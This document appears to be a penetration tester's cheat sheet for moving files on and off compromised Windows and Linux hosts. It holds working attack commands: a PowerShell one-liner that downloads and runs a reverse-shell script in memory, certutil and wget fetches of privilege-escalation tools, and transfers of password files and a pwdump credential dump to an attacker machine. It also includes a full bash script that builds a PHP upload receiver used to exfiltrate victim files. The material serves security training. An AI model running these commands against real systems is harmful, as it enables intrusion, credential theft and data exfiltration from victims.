File Transfer

nc

Receiving machine:

nc -nlvp 4444 > incoming.exe

Sending machine:

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

nc gives no end-of-file signal to the listener: once the sending nc exits (or the byte count stops growing), stop the listener with Ctrl-C and compare a hash on both ends (md5sum / sha256sum on Linux, certutil -hashfile <file> SHA256 on Windows) before trusting the copy.

socat

Sending:

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Receiving (connect to the sender and write the stream to a file; the create option makes socat create the file if it does not exist yet):

socat TCP4:<sender's ip address>:443 file:secret_passwords.txt,create

socat equivalents of two common nc invocations, for reference:

nc <remote server's ip address> 80   is the same as   socat - TCP4:<remote server's ip address>:80
sudo nc -lvp 443                     is the same as   sudo socat TCP4-LISTEN:443 STDOUT

PowerShell

Set-ExecutionPolicy Unrestricted

Changing the machine-wide policy needs an elevated shell; as an unprivileged user add -Scope CurrentUser, or skip the policy entirely by launching the script with powershell -ExecutionPolicy Bypass. The execution policy only gates script files (.ps1); the -c one-liners below run regardless of it.

Download a file and save it to a chosen path:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Downloads and runs without saving to disk:

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')

Invoke-WebRequest (PowerShell 3.0 and later; iwr is its alias):

invoke-webrequest -uri http://10.10.14.5/JuicyPotato.exe -outfile jp.exe

certutil

certutil -urlcache -f http://10.10.16.2:8899/winpeas.bat winpeas.bat

certutil is a signed Microsoft binary, so it works where downloaded tooling is blocked, but a certutil -urlcache download is a well-known LOLBin pattern that Defender and most EDR products flag; expect it to be logged or blocked on a monitored host.

wget

wget http://10.50.121.50:8000/LinPEAS.sh -O lp.sh

Note the capital -O: lower-case -o is the log file option and leaves the script saved under its original name.

scp

From the attacker machine, pulling a file from a Windows host running OpenSSH:

scp ariah@192.168.130.99:C:/ftp/Infrastructure.pdf .

A password (or key) is required and sshd has to be running on the victim, which is the source of the file. On a Linux source, start it if necessary:

systemctl start ssh.socket

Windows Exfiltration

Even when most egress is blocked, outbound HTTP is usually still allowed, which makes a web upload the most reliable exfiltration channel.

Create the upload.php file and save it in /var/www/html on kali:

<?php
$uploaddir = '/var/www/uploads/';
// basename() strips any directory part the client sends, so a name such as
// ../../html/shell.php cannot escape the uploads directory.
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

This handles a multipart POST and saves the uploaded file under /var/www/uploads. Anyone who can reach port 80 on the kali box can post to it, so take the endpoint down when the engagement step is done.

Next create the uploads folder and make it writable by www-data, the user Apache runs PHP as on kali.

Then trigger the upload from the victim:

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Where the IP is the kali machine hosting upload.php; important.docx should now be in the kali uploads directory.
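The whole kali-side setup of the section above as one script. This is an added example, not part of the original notes: it writes a slightly hardened upload.php (it checks that a file actually arrived, runs the client-supplied name through basename() and reports failures instead of returning 200 silently), creates the uploads directory and hands it to the web server user. The web root, upload directory and owner are parameters; /var/www/html and www-data are the assumed Apache defaults on kali, and you can point it at a scratch directory to try it without root.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Builds the HTTP upload
# receiver: upload.php in WEBROOT, writable UPLOADDIR owned by OWNER.
# Assumed defaults for kali: /var/www/html, /var/www/uploads, www-data.
set -eu

# write_upload_php WEBROOT UPLOADDIR
# Writes the handler. basename() strips any directory part the client sends,
# so a name like "../../html/shell.php" cannot escape UPLOADDIR. Remember that
# anyone who can reach the web server can POST to this endpoint.
write_upload_php() {
  webroot="$1"
  uploaddir="${2%/}/"
  sed "s|__UPLOADDIR__|$uploaddir|" > "$webroot/upload.php" <<'EOF'
<?php
$uploaddir = '__UPLOADDIR__';
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit("no file\n");
}
$name = basename($_FILES['file']['name']);
if ($name === '' || $name === '.' || $name === '..') {
    http_response_code(400);
    exit("bad name\n");
}
$uploadfile = $uploaddir . $name;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
    http_response_code(500);
    exit("move failed\n");
}
echo "saved ", $name, "\n";
EOF
}

# setup_upload_receiver WEBROOT UPLOADDIR OWNER
# Creates the upload directory, gives it to the web server user so PHP can
# write into it, keeps it unreadable to others, then drops in the handler.
setup_upload_receiver() {
  mkdir -p "$1" "$2"
  chown "$3" "$2"
  chmod 750 "$2"
  write_upload_php "$1" "$2"
}

# upload_php_ready WEBROOT UPLOADDIR
# Post-setup sanity check: handler present, it sanitises the filename,
# it points at UPLOADDIR, and UPLOADDIR exists. Returns 0 when all hold.
upload_php_ready() {
  uploaddir="${2%/}/"
  [ -f "$1/upload.php" ] &&
    grep -q "basename(" "$1/upload.php" &&
    grep -qF "'$uploaddir'" "$1/upload.php" &&
    [ -d "$uploaddir" ]
}

# Real use on kali (root needed for /var/www and the chown):
#   sudo bash upload_receiver.sh /var/www/html /var/www/uploads www-data
if [ "$#" -eq 3 ]; then
  setup_upload_receiver "$1" "$2" "$3"
  upload_php_ready "$1" "$2" && echo "receiver ready: $2"
fi
```

After running it, restart nothing: Apache picks up the new file immediately, and the victim-side UploadFile call from the notes works unchanged. Check /var/www/uploads after the upload and remove upload.php once you are done with it.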

SMB

My personal fave, great for Windows machines. Start an SMB share of the current directory on kali (the examples below use the share name sharez):

smbserver.py sharez . --smb2support

Current Windows builds refuse unauthenticated guest access to SMB shares by default; if the copy fails with an access-denied error, give smbserver.py -username and -password and map the share first with net use.

Copy to the remote machine (UNC paths take single backslashes):

copy \\192.168.119.153\sharez\nc.exe "C:\Documents and Settings\no\nc.exe"

Copy to kali:

copy "C:\Documents and Settings\no\127.0.0.1.pwdump" \\192.168.119.153\sharez\127.0.0.1.pwdump